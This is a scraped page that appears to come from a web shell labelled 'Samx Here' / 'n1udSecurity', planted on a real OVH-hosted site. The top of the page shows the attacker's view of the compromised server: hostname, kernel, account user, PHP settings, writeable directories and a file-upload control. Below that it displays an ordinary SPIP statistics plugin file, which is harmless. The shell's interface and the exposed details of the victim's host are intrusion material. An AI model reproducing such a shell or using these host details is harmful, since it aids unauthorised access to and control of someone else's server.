Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/ecole/plugins-dist/statistiques/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/ecole/plugins-dist/statistiques/stats_ieconfig.php
<?php

/**
 * Déclarations des configurations qui peuvent être sauvegardées
 *
 * @plugin Statistiques pour SPIP
 * @license GNU/GPL
 * @package SPIP\Stats\Pipelines
 **/

if (!defined('_ECRIRE_INC_VERSION')) {
	return;
}

/**
 * Ajoute les metas sauvegardables de Statistiques pour le plugin IEConfig
 *
 * @pipeline ieconfig_metas
 *
 * @param array $table
 *     Déclaration des sauvegardes
 * @return array
 *     Déclaration des sauvegardes complétées
 **/
function stats_ieconfig_metas($table) {
	$table['statistiques_meta']['titre'] = _T('statistiques:info_forum_statistiques');
	$table['statistiques_meta']['icone'] = 'statistique-16.png';
	$table['statistiques_meta']['metas_brutes'] = 'activer_statistiques,activer_captures_referers';

	return $table;
}

SAMX